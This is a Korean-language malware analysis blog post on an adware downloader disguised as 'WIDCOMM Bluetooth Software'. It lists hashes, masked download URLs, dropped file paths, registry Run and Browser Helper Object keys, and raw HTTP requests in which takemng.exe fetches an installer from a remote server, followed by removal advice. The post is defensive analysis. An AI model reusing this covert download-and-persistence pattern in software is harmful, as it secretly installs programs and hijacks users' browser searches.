본문 바로가기

벌새::Analysis

국내 악성코드 : WIDCOMM Bluetooth Software

반응형
국내에서 제작된 악성코드 Win-Adware/Cn8cls.236544 (AhnLab V3)를 통해 사용자 몰래 설치가 이루어지고 있는 WIDCOMM Bluetooth Software 악성 프로그램에 대해 살펴보도록 하겠습니다.
 

WIDCOMM Bluetooth Software 악성 프로그램 설치 파일(MD5 : 499815b335a3acbfae183c1b3c2466c6)에 대하여 안철수연구소(AhnLab) V3 보안 제품에서는 Downloader/Win32.Generic (VirusTotal : 17/42) 진단명으로 사전 차단을 하고 있으며, 마이크로소프트(Microsoft)사의 보안 제품에서는 TrojanDownloader:Win32/Parkchicers.C 진단명으로 진단이 되고 있습니다.

 

이는 국내 악성코드 진단명 TrojanDownloader:Win32/Parkchicers 시리즈의 변종으로 추정을 할 수 있습니다.

 

[관련 URL 정보]

h**p://www.g****.co.kr/***/takemng/TU.dll
h**p://www.g****.co.kr/***/takemng/takemng.exe

 

[생성 파일 진단 정보]

C:\Program Files\WIDCOMM\Bluetooth Software\bin\TU.dll (Microsoft : TrojanDownloader:Win32/Parkchicers.C)
(MD5 : 8421f8570a49d3d35cef3f80d19c28cb)

C:\WINDOWS\system32\service\takemng.exe (AhnLab V3 : Downloader/Win32.Rogue)
(MD5 : f96345b3c52d9fec2fd4b2760f6c4fd6)

 

해당 악성 프로그램이 설치된 환경에서 Windows 시작시 takemng.exe 파일을 시작 프로그램으로 등록하여 자동 실행되며, 실행된 프로그램은 다음과 같은 동작을 하는 것을 확인할 수 있습니다.

 

[takemng.exe 네트워크 연결 정보]

GET /bho/takemng/takemng.iim HTTP/1.1
User-Agent: IEUpdater
Host: www.gfind.co.kr
Connection: Keep-Alive
Cache-Control: no-cache

GET /Yahoo/yahooh4setup725.exe HTTP/1.1
User-Agent: IEUpdater
Host: 220.**.213.***
Connection: Keep-Alive
Cache-Control: no-cache

즉, 시스템 시작시 특정 서버로부터 사용자 몰래 [Yahoo Helper 2.0 - Yahoo Helper4] 프로그램을 설치하여 Internet Explorer를 통한 키워드 가로채기가 이루어지는 것을 이전에 확인할 수 있었습니다.

 

특히 시작 프로그램으로 등록된 takemng.exe 파일은 마이크로소프트(Microsoft)사에서 제작한 Windows Services 파일로 위장을 하고 있는 것을 확인할 수 있습니다.

{D045A6CC-D55C-4312-A987-B663549BBBAF}
 - 게시자 : 알 수 없음
 - CLSID : {D045A6CC-D55C-4312-A987-B663549BBBAF}
 - C:\Program Files\WIDCOMM\Bluetooth Software\bin\TU.dll

 

추가적으로 설치되는 TU.dll 파일과 관련하여 프로세스 정보를 살펴보면 Internet Explorer 실행시 iexplore.exe 프로세스에 BHO 방식으로 추가하여 동작하는 것을 확인할 수 있습니다.

해당 악성 프로그램은 삭제 기능을 제공하지 않으므로 유명 보안 제품을 통한 진단 및 치료를 하시기를 권장하며, 수동 삭제시에는 Internet Explorer를 완전히 종료한 상태에서 제시된 폴더, 파일, 레지스트리 항목을 삭제하시기 바랍니다.

 

[생성 레지스트리 등록 정보]

HKEY_CLASSES_ROOT\CLSID\{D045A6CC-D55C-4312-A987-B663549BBBAF}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
 - takemng = C:\WINDOWS\system32\service\takemng.exe
HKEY_CURRENT_USER\Software\takemng
HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D045A6CC-D55C-4312-A987-B663549BBBAF}


해당 악성코드의 경우 공개적으로 알려진 Bluetooth, Microsoft와 관련된 이름으로 위장을 하고 있으므로 단순히 폴더(파일) 이름으로 구분하기 어렵게 구성되어 있습니다.

그러므로 컴퓨터에 원치않는 수상한 프로그램이 설치되거나 동작이 확인된 경우 보안 제품을 통한 시스템 정밀 검사를 통해 악성 여부를 판단하시거나, 바이러스토탈(VirusTotal) 서비스에 의심스러운 파일을 업로드하여 검사를 하시기 바랍니다.

728x90
반응형